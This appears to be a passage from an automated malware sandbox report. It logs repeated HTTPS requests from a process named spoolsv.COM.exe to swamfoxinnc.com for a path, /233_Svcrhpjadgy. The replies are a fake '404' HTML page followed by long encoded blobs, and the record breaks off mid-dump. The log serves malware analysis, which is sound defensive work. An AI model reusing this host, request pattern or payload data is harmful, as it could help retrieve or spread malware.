                                                                            Data Ascii: 57Co2GLLyEyOHa4j0DeAooXsQlEL/ER9yxkrMCp0AzhSHBRbgKPIGyHbQOnmVSbsVIwqDm5zWCTRXdjRcc/HM7CfdT4ETr4QRNSw0fKOMaNaz/hGzQsjnWkjj/ogrDUY9U6lwyw+HFlu8eHIsK8OTX133aXT89Qc3xmFbE5YJKnR1U+mesNiLSwHkSHb1Oen7Qu0CWmZiws571YYY+sntZrcY+vF+eFWSXLc6fB8OI0K/WJ00/GfaAThsedC8oT
                                                                            2024-12-23 06:38:06 UTC16384INData Raw: 5a 4a 76 46 56 68 6b 45 41 34 6b 30 52 43 77 6d 44 6a 47 4f 69 73 37 51 6a 44 65 4d 71 43 61 78 50 50 79 42 4d 57 33 62 4d 35 34 6c 33 2b 70 53 71 59 37 2b 72 2f 53 6b 67 55 62 4a 4d 70 6a 42 6a 33 6e 38 34 6d 37 75 57 31 49 31 51 67 43 49 63 6b 72 46 6b 51 44 63 42 33 41 42 6a 4b 39 35 78 43 36 31 4e 77 42 50 4e 63 78 6f 53 41 52 49 7a 48 37 65 57 6a 63 35 58 6b 70 2f 39 49 75 6f 41 6d 41 6f 67 4a 6d 46 5a 35 32 4c 49 73 67 72 41 41 49 41 67 45 41 70 76 79 66 46 53 39 41 49 79 67 63 66 4b 36 2f 2f 46 35 43 59 6c 78 47 51 53 55 53 4e 53 62 6e 51 79 31 34 71 55 50 64 48 42 74 35 41 4a 72 36 46 46 31 4b 79 50 66 2b 62 52 46 6f 72 2b 6f 76 4c 6a 46 63 7a 48 6b 6a 58 7a 61 58 67 71 35 6c 49 35 77 49 33 61 77 44 34 69 53 53 4d 4b 4f 6e 6d 50 53 48 52 6b 6e 46
                                                                            Data Ascii: ZJvFVhkEA4k0RCwmDjGOis7QjDeMqCaxPPyBMW3bM54l3+pSqY7+r/SkgUbJMpjBj3n84m7uW1I1QgCIckrFkQDcB3ABjK95xC61NwBPNcxoSARIzH7eWjc5Xkp/9IuoAmAogJmFZ52LIsgrAAIAgEApvyfFS9AIygcfK6//F5CYlxGQSUSNSbnQy14qUPdHBt5AJr6FF1KyPf+bRFor+ovLjFczHkjXzaXgq5lI5wI3awD4iSSMKOnmPSHRknF
                                                                            2024-12-23 06:38:06 UTC9335INData Raw: 6e 45 73 42 71 4c 41 57 49 56 70 54 58 74 33 48 59 58 4e 54 4f 54 36 2b 68 64 31 4c 52 42 30 66 69 31 34 58 79 33 75 36 45 34 59 4e 71 53 35 6d 73 32 78 66 73 71 37 68 4e 4a 4c 73 39 68 42 74 78 51 63 50 35 57 73 52 73 58 4e 59 68 61 6f 69 37 45 44 76 32 4a 66 46 67 4d 44 52 4b 50 59 6e 69 6d 63 78 56 55 59 6c 4f 45 77 39 77 71 48 48 36 42 50 62 7a 70 37 4b 33 58 53 61 62 53 4d 74 77 32 7a 61 42 6d 65 55 6d 4a 54 52 48 36 63 5a 4d 2f 2f 32 31 72 4d 58 4e 35 33 36 56 66 44 58 43 31 53 44 71 75 61 36 74 44 4e 72 32 6d 65 48 65 6d 2b 59 6c 33 52 6b 36 53 49 70 5a 56 35 56 4e 34 32 6c 33 44 30 6a 57 6c 58 74 31 37 6e 32 33 4e 59 52 5a 54 79 38 6b 78 55 68 37 43 30 47 4c 64 5a 63 54 73 76 77 46 79 59 31 50 79 64 4a 78 5a 6d 4b 71 48 77 6e 49 67 49 6e 5a 43 30
                                                                            Data Ascii: nEsBqLAWIVpTXt3HYXNTOT6+hd1LRB0fi14Xy3u6E4YNqS5ms2xfsq7hNJLs9hBtxQcP5WsRsXNYhaoi7EDv2JfFgMDRKPYnimcxVUYlOEw9wqHH6BPbzp7K3XSabSMtw2zaBmeUmJTRH6cZM//21rMXN536VfDXC1SDqua6tDNr2meHem+Yl3Rk6SIpZV5VN42l3D0jWlXt17n23NYRZTy8kxUh7C0GLdZcTsvwFyY1PydJxZmKqHwnIgInZC0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            8192.168.2.1049775176.123.5.1434437596C:\Users\user\Desktop\spoolsv.COM.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-23 06:38:08 UTC164OUTGET /233_Svcrhpjadgy HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                            Host: swamfoxinnc.com
                                                                            2024-12-23 06:38:09 UTC191INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Mon, 23 Dec 2024 06:38:09 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 58296
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            ETag: "674db0b4-e3b8"
                                                                            2024-12-23 06:38:09 UTC16193INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a
                                                                            Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {
                                                                            2024-12-23 06:38:09 UTC16384INData Raw: 35 37 43 6f 32 47 4c 4c 79 45 79 4f 48 61 34 6a 30 44 65 41 6f 6f 58 73 51 6c 45 4c 2f 45 52 39 79 78 6b 72 4d 43 70 30 41 7a 68 53 48 42 52 62 67 4b 50 49 47 79 48 62 51 4f 6e 6d 56 53 62 73 56 49 77 71 44 6d 35 7a 57 43 54 52 58 64 6a 52 63 63 2f 48 4d 37 43 66 64 54 34 45 54 72 34 51 52 4e 53 77 30 66 4b 4f 4d 61 4e 61 7a 2f 68 47 7a 51 73 6a 6e 57 6b 6a 6a 2f 6f 67 72 44 55 59 39 55 36 6c 77 79 77 2b 48 46 6c 75 38 65 48 49 73 4b 38 4f 54 58 31 33 33 61 58 54 38 39 51 63 33 78 6d 46 62 45 35 59 4a 4b 6e 52 31 55 2b 6d 65 73 4e 69 4c 53 77 48 6b 53 48 62 31 4f 65 6e 37 51 75 30 43 57 6d 5a 69 77 73 35 37 31 59 59 59 2b 73 6e 74 5a 72 63 59 2b 76 46 2b 65 46 57 53 58 4c 63 36 66 42 38 4f 49 30 4b 2f 57 4a 30 30 2f 47 66 61 41 54 68 73 65 64 43 38 6f 54
                                                                            Data Ascii: 57Co2GLLyEyOHa4j0DeAooXsQlEL/ER9yxkrMCp0AzhSHBRbgKPIGyHbQOnmVSbsVIwqDm5zWCTRXdjRcc/HM7CfdT4ETr4QRNSw0fKOMaNaz/hGzQsjnWkjj/ogrDUY9U6lwyw+HFlu8eHIsK8OTX133aXT89Qc3xmFbE5YJKnR1U+mesNiLSwHkSHb1Oen7Qu0CWmZiws571YYY+sntZrcY+vF+eFWSXLc6fB8OI0K/WJ00/GfaAThsedC8oT
                                                                            2024-12-23 06:38:09 UTC16384INData Raw: 5a 4a 76 46 56 68 6b 45 41 34 6b 30 52 43 77 6d 44 6a 47 4f 69 73 37 51 6a 44 65 4d 71 43 61 78 50 50 79 42 4d 57 33 62 4d 35 34 6c 33 2b 70 53 71 59 37 2b 72 2f 53 6b 67 55 62 4a 4d 70 6a 42 6a 33 6e 38 34 6d 37 75 57 31 49 31 51 67 43 49 63 6b 72 46 6b 51 44 63 42 33 41 42 6a 4b 39 35 78 43 36 31 4e 77 42 50 4e 63 78 6f 53 41 52 49 7a 48 37 65 57 6a 63 35 58 6b 70 2f 39 49 75 6f 41 6d 41 6f 67 4a 6d 46 5a 35 32 4c 49 73 67 72 41 41 49 41 67 45 41 70 76 79 66 46 53 39 41 49 79 67 63 66 4b 36 2f 2f 46 35 43 59 6c 78 47 51 53 55 53 4e 53 62 6e 51 79 31 34 71 55 50 64 48 42 74 35 41 4a 72 36 46 46 31 4b 79 50 66 2b 62 52 46 6f 72 2b 6f 76 4c 6a 46 63 7a 48 6b 6a 58 7a 61 58 67 71 35 6c 49 35 77 49 33 61 77 44 34 69 53 53 4d 4b 4f 6e 6d 50 53 48 52 6b 6e 46
                                                                            Data Ascii: ZJvFVhkEA4k0RCwmDjGOis7QjDeMqCaxPPyBMW3bM54l3+pSqY7+r/SkgUbJMpjBj3n84m7uW1I1QgCIckrFkQDcB3ABjK95xC61NwBPNcxoSARIzH7eWjc5Xkp/9IuoAmAogJmFZ52LIsgrAAIAgEApvyfFS9AIygcfK6//F5CYlxGQSUSNSbnQy14qUPdHBt5AJr6FF1KyPf+bRFor+ovLjFczHkjXzaXgq5lI5wI3awD4iSSMKOnmPSHRknF
                                                                            2024-12-23 06:38:09 UTC9335INData Raw: 6e 45 73 42 71 4c 41 57 49 56 70 54 58 74 33 48 59 58 4e 54 4f 54 36 2b 68 64 31 4c 52 42 30 66 69 31 34 58 79 33 75 36 45 34 59 4e 71 53 35 6d 73 32 78 66 73 71 37 68 4e 4a 4c 73 39 68 42 74 78 51 63 50 35 57 73 52 73 58 4e 59 68 61 6f 69 37 45 44 76 32 4a 66 46 67 4d 44 52 4b 50 59 6e 69 6d 63 78 56 55 59 6c 4f 45 77 39 77 71 48 48 36 42 50 62 7a 70 37 4b 33 58 53 61 62 53 4d 74 77 32 7a 61 42 6d 65 55 6d 4a 54 52 48 36 63 5a 4d 2f 2f 32 31 72 4d 58 4e 35 33 36 56 66 44 58 43 31 53 44 71 75 61 36 74 44 4e 72 32 6d 65 48 65 6d 2b 59 6c 33 52 6b 36 53 49 70 5a 56 35 56 4e 34 32 6c 33 44 30 6a 57 6c 58 74 31 37 6e 32 33 4e 59 52 5a 54 79 38 6b 78 55 68 37 43 30 47 4c 64 5a 63 54 73 76 77 46 79 59 31 50 79 64 4a 78 5a 6d 4b 71 48 77 6e 49 67 49 6e 5a 43 30
                                                                            Data Ascii: nEsBqLAWIVpTXt3HYXNTOT6+hd1LRB0fi14Xy3u6E4YNqS5ms2xfsq7hNJLs9hBtxQcP5WsRsXNYhaoi7EDv2JfFgMDRKPYnimcxVUYlOEw9wqHH6BPbzp7K3XSabSMtw2zaBmeUmJTRH6cZM//21rMXN536VfDXC1SDqua6tDNr2meHem+Yl3Rk6SIpZV5VN42l3D0jWlXt17n23NYRZTy8kxUh7C0GLdZcTsvwFyY1PydJxZmKqHwnIgInZC0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            9192.168.2.1049786176.123.5.1434437596C:\Users\user\Desktop\spoolsv.COM.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-23 06:38:11 UTC164OUTGET /233_Svcrhpjadgy HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                            Host: swamfoxinnc.com
                                                                            2024-12-23 06:38:12 UTC191INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Mon, 23 Dec 2024 06:38:12 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 58296
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            ETag: "674db0b4-e3b8"
                                                                            2024-12-23 06:38:12 UTC16193INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a
                                                                            Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {
                                                                            2024-12-23 06:38:12 UTC16384INData Raw: 35 37 43 6f 32 47 4c 4c 79 45 79 4f 48 61 34 6a 30 44 65 41 6f 6f 58 73 51 6c 45 4c 2f 45 52 39 79 78 6b 72 4d 43 70 30 41 7a 68 53 48 42 52 62 67 4b 50 49 47 79 48 62 51 4f 6e 6d 56 53 62 73 56 49 77 71 44 6d 35 7a 57 43 54 52 58 64 6a 52 63 63 2f 48 4d 37 43 66 64 54 34 45 54 72 34 51 52 4e 53 77 30 66 4b 4f 4d 61 4e 61 7a 2f 68 47 7a 51 73 6a 6e 57 6b 6a 6a 2f 6f 67 72 44 55 59 39 55 36 6c 77 79 77 2b 48 46 6c 75 38 65 48 49 73 4b 38 4f 54 58 31 33 33 61 58 54 38 39 51 63 33 78 6d 46 62 45 35 59 4a 4b 6e 52 31 55 2b 6d 65 73 4e 69 4c 53 77 48 6b 53 48 62 31 4f 65 6e 37 51 75 30 43 57 6d 5a 69 77 73 35 37 31 59 59 59 2b 73 6e 74 5a 72 63 59 2b 76 46 2b 65 46 57 53 58 4c 63 36 66 42 38 4f 49 30 4b 2f 57 4a 30 30 2f 47 66 61 41 54 68 73 65 64 43 38 6f 54
                                                                            Data Ascii: 57Co2GLLyEyOHa4j0DeAooXsQlEL/ER9yxkrMCp0AzhSHBRbgKPIGyHbQOnmVSbsVIwqDm5zWCTRXdjRcc/HM7CfdT4ETr4QRNSw0fKOMaNaz/hGzQsjnWkjj/ogrDUY9U6lwyw+HFlu8eHIsK8OTX133aXT89Qc3xmFbE5YJKnR1U+mesNiLSwHkSHb1Oen7Qu0CWmZiws571YYY+sntZrcY+vF+eFWSXLc6fB8OI0K/WJ00/GfaAThsedC8oT
                                                                            2024-12-23 06:38:13 UTC16384INData Raw: 5a 4a 76 46 56 68 6b 45 41 34 6b 30 52 43 77 6d 44 6a 47 4f 69 73 37 51 6a 44 65 4d 71 43 61 78 50 50 79 42 4d 57 33 62 4d 35 34 6c 33 2b 70 53 71 59 37 2b 72 2f 53 6b 67 55 62 4a 4d 70 6a 42 6a 33 6e 38 34 6d 37 75 57 31 49 31 51 67 43 49 63 6b 72 46 6b 51 44 63 42 33 41 42 6a 4b 39 35 78 43 36 31 4e 77 42 50 4e 63 78 6f 53 41 52 49 7a 48 37 65 57 6a 63 35 58 6b 70 2f 39 49 75 6f 41 6d 41 6f 67 4a 6d 46 5a 35 32 4c 49 73 67 72 41 41 49 41 67 45 41 70 76 79 66 46 53 39 41 49 79 67 63 66 4b 36 2f 2f 46 35 43 59 6c 78 47 51 53 55 53 4e 53 62 6e 51 79 31 34 71 55 50 64 48 42 74 35 41 4a 72 36 46 46 31 4b 79 50 66 2b 62 52 46 6f 72 2b 6f 76 4c 6a 46 63 7a 48 6b 6a 58 7a 61 58 67 71 35 6c 49 35 77 49 33 61 77 44 34 69 53 53 4d 4b 4f 6e 6d 50 53 48 52 6b 6e 46
                                                                            Data Ascii: ZJvFVhkEA4k0RCwmDjGOis7QjDeMqCaxPPyBMW3bM54l3+pSqY7+r/SkgUbJMpjBj3n84m7uW1I1QgCIckrFkQDcB3ABjK95xC61NwBPNcxoSARIzH7eWjc5Xkp/9IuoAmAogJmFZ52LIsgrAAIAgEApvyfFS9AIygcfK6//F5CYlxGQSUSNSbnQy14qUPdHBt5AJr6FF1KyPf+bRFor+ovLjFczHkjXzaXgq5lI5wI3awD4iSSMKOnmPSHRknF
                                                                            2024-12-23 06:38:13 UTC9335INData Raw: 6e 45 73 42 71 4c 41 57 49 56 70 54 58 74 33 48 59 58 4e 54 4f 54 36 2b 68 64 31 4c 52 42 30 66 69 31 34 58 79 33 75 36 45 34 59 4e 71 53 35 6d 73 32 78 66 73 71 37 68 4e 4a 4c 73 39 68 42 74 78 51 63 50 35 57 73 52 73 58 4e 59 68 61 6f 69 37 45 44 76 32 4a 66 46 67 4d 44 52 4b 50 59 6e 69 6d 63 78 56 55 59 6c 4f 45 77 39 77 71 48 48 36 42 50 62 7a 70 37 4b 33 58 53 61 62 53 4d 74 77 32 7a 61 42 6d 65 55 6d 4a 54 52 48 36 63 5a 4d 2f 2f 32 31 72 4d 58 4e 35 33 36 56 66 44 58 43 31 53 44 71 75 61 36 74 44 4e 72 32 6d 65 48 65 6d 2b 59 6c 33 52 6b 36 53 49 70 5a 56 35 56 4e 34 32 6c 33 44 30 6a 57 6c 58 74 31 37 6e 32 33 4e 59 52 5a 54 79 38 6b 78 55 68 37 43 30 47 4c 64 5a 63 54 73 76 77 46 79 59 31 50 79 64 4a 78 5a 6d 4b 71 48 77 6e 49 67 49 6e 5a 43 30
                                                                            Data Ascii: nEsBqLAWIVpTXt3HYXNTOT6+hd1LRB0fi14Xy3u6E4YNqS5ms2xfsq7hNJLs9hBtxQcP5WsRsXNYhaoi7EDv2JfFgMDRKPYnimcxVUYlOEw9wqHH6BPbzp7K3XSabSMtw2zaBmeUmJTRH6cZM//21rMXN536VfDXC1SDqua6tDNr2meHem+Yl3Rk6SIpZV5VN42l3D0jWlXt17n23NYRZTy8kxUh7C0GLdZcTsvwFyY1PydJxZmKqHwnIgInZC0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            10192.168.2.1049794176.123.5.1434437596C:\Users\user\Desktop\spoolsv.COM.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-23 06:38:14 UTC164OUTGET /233_Svcrhpjadgy HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                            Host: swamfoxinnc.com
                                                                            2024-12-23 06:38:16 UTC191INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Mon, 23 Dec 2024 06:38:15 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 58296
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            ETag: "674db0b4-e3b8"
                                                                            2024-12-23 06:38:16 UTC16193INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a
                                                                            Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {
                                                                            2024-12-23 06:38:16 UTC16384INData Raw: 35 37 43 6f 32 47 4c 4c 79 45 79 4f 48 61 34 6a 30 44 65 41 6f 6f 58 73 51 6c 45 4c 2f 45 52 39 79 78 6b 72 4d 43 70 30 41 7a 68 53 48 42 52 62 67 4b 50 49 47 79 48 62 51 4f 6e 6d 56 53 62 73 56 49 77 71 44 6d 35 7a 57 43 54 52 58 64 6a 52 63 63 2f 48 4d 37 43 66 64 54 34 45 54 72 34 51 52 4e 53 77 30 66 4b 4f 4d 61 4e 61 7a 2f 68 47 7a 51 73 6a 6e 57 6b 6a 6a 2f 6f 67 72 44 55 59 39 55 36 6c 77 79 77 2b 48 46 6c 75 38 65 48 49 73 4b 38 4f 54 58 31 33 33 61 58 54 38 39 51 63 33 78 6d 46 62 45 35 59 4a 4b 6e 52 31 55 2b 6d 65 73 4e 69 4c 53 77 48 6b 53 48 62 31 4f 65 6e 37 51 75 30 43 57 6d 5a 69 77 73 35 37 31 59 59 59 2b 73 6e 74 5a 72 63 59 2b 76 46 2b 65 46 57 53 58 4c 63 36 66 42 38 4f 49 30 4b 2f 57 4a 30 30 2f 47 66 61 41 54 68 73 65 64 43 38 6f 54
                                                                            Data Ascii: 57Co2GLLyEyOHa4j0DeAooXsQlEL/ER9yxkrMCp0AzhSHBRbgKPIGyHbQOnmVSbsVIwqDm5zWCTRXdjRcc/HM7CfdT4ETr4QRNSw0fKOMaNaz/hGzQsjnWkjj/ogrDUY9U6lwyw+HFlu8eHIsK8OTX133aXT89Qc3xmFbE5YJKnR1U+mesNiLSwHkSHb1Oen7Qu0CWmZiws571YYY+sntZrcY+vF+eFWSXLc6fB8OI0K/WJ00/GfaAThsedC8oT
                                                                            2024-12-23 06:38:16 UTC16384INData Raw: 5a 4a 76 46 56 68 6b 45 41 34 6b 30 52 43 77 6d 44 6a 47 4f 69 73 37 51 6a 44 65 4d 71 43 61 78 50 50 79 42 4d 57 33 62 4d 35 34 6c 33 2b 70 53 71 59 37 2b 72 2f 53 6b 67 55 62 4a 4d 70 6a 42 6a 33 6e 38 34 6d 37 75 57 31 49 31 51 67 43 49 63 6b 72 46 6b 51 44 63 42 33 41 42 6a 4b 39 35 78 43 36 31 4e 77 42 50 4e 63 78 6f 53 41 52 49 7a 48 37 65 57 6a 63 35 58 6b 70 2f 39 49 75 6f 41 6d 41 6f 67 4a 6d 46 5a 35 32 4c 49 73 67 72 41 41 49 41 67 45 41 70 76 79 66 46 53 39 41 49 79 67 63 66 4b 36 2f 2f 46 35 43 59 6c 78 47 51 53 55 53 4e 53 62 6e 51 79 31 34 71 55 50 64 48 42 74 35 41 4a 72 36 46 46 31 4b 79 50 66 2b 62 52 46 6f 72 2b 6f 76 4c 6a 46 63 7a 48 6b 6a 58 7a 61 58 67 71 35 6c 49 35 77 49 33 61 77 44 34 69 53 53 4d 4b 4f 6e 6d 50 53 48 52 6b 6e 46
                                                                            Data Ascii: ZJvFVhkEA4k0RCwmDjGOis7QjDeMqCaxPPyBMW3bM54l3+pSqY7+r/SkgUbJMpjBj3n84m7uW1I1QgCIckrFkQDcB3ABjK95xC61NwBPNcxoSARIzH7eWjc5Xkp/9IuoAmAogJmFZ52LIsgrAAIAgEApvyfFS9AIygcfK6//F5CYlxGQSUSNSbnQy14qUPdHBt5AJr6FF1KyPf+bRFor+ovLjFczHkjXzaXgq5lI5wI3awD4iSSMKOnmPSHRknF
                                                                            2024-12-23 06:38:16 UTC9335INData Raw: 6e 45 73 42 71 4c 41 57 49 56 70 54 58 74 33 48 59 58 4e 54 4f 54 36 2b 68 64 31 4c 52 42 30 66 69 31 34 58 79 33 75 36 45 34 59 4e 71 53 35 6d 73 32 78 66 73 71 37 68 4e 4a 4c 73 39 68 42 74 78 51 63 50 35 57 73 52 73 58 4e 59 68 61 6f 69 37 45 44 76 32 4a 66 46 67 4d 44 52 4b 50 59 6e 69 6d 63 78 56 55 59 6c 4f 45 77 39 77 71 48 48 36 42 50 62 7a 70 37 4b 33 58 53 61 62 53 4d 74 77 32 7a 61 42 6d 65 55 6d 4a 54 52 48 36 63 5a 4d 2f 2f 32 31 72 4d 58 4e 35 33 36 56 66 44 58 43 31 53 44 71 75 61 36 74 44 4e 72 32 6d 65 48 65 6d 2b 59 6c 33 52 6b 36 53 49 70 5a 56 35 56 4e 34 32 6c 33 44 30 6a 57 6c 58 74 31 37 6e 32 33 4e 59 52 5a 54 79 38 6b 78 55 68 37 43 30 47 4c 64 5a 63 54 73 76 77 46 79 59 31 50 79 64 4a 78 5a 6d 4b 71 48 77 6e 49 67 49 6e 5a 43 30
                                                                            Data Ascii: nEsBqLAWIVpTXt3HYXNTOT6+hd1LRB0fi14Xy3u6E4YNqS5ms2xfsq7hNJLs9hBtxQcP5WsRsXNYhaoi7EDv2JfFgMDRKPYnimcxVUYlOEw9wqHH6BPbzp7K3XSabSMtw2zaBmeUmJTRH6cZM//21rMXN536VfDXC1SDqua6tDNr2meHem+Yl3Rk6SIpZV5VN42l3D0jWlXt17n23NYRZTy8kxUh7C0GLdZcTsvwFyY1PydJxZmKqHwnIgInZC0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            11192.168.2.1049805176.123.5.1434437596C:\Users\user\Desktop\spoolsv.COM.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-23 06:38:18 UTC164OUTGET /233_Svcrhpjadgy HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                            Host: swamfoxinnc.com
                                                                            2024-12-23 06:38:19 UTC191INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Mon, 23 Dec 2024 06:38:19 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 58296
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            ETag: "674db0b4-e3b8"
                                                                            2024-12-23 06:38:19 UTC16193INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a
                                                                            Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {
                                                                            2024-12-23 06:38:19 UTC16384INData Raw: 35 37 43 6f 32 47 4c 4c 79 45 79 4f 48 61 34 6a 30 44 65 41 6f 6f 58 73 51 6c 45 4c 2f 45 52 39 79 78 6b 72 4d 43 70 30 41 7a 68 53 48 42 52 62 67 4b 50 49 47 79 48 62 51 4f 6e 6d 56 53 62 73 56 49 77 71 44 6d 35 7a 57 43 54 52 58 64 6a 52 63 63 2f 48 4d 37 43 66 64 54 34 45 54 72 34 51 52 4e 53 77 30 66 4b 4f 4d 61 4e 61 7a 2f 68 47 7a 51 73 6a 6e 57 6b 6a 6a 2f 6f 67 72 44 55 59 39 55 36 6c 77 79 77 2b 48 46 6c 75 38 65 48 49 73 4b 38 4f 54 58 31 33 33 61 58 54 38 39 51 63 33 78 6d 46 62 45 35 59 4a 4b 6e 52 31 55 2b 6d 65 73 4e 69 4c 53 77 48 6b 53 48 62 31 4f 65 6e 37 51 75 30 43 57 6d 5a 69 77 73 35 37 31 59 59 59 2b 73 6e 74 5a 72 63 59 2b 76 46 2b 65 46 57 53 58 4c 63 36 66 42 38 4f 49 30 4b 2f 57 4a 30 30 2f 47 66 61 41 54 68 73 65 64 43 38 6f 54
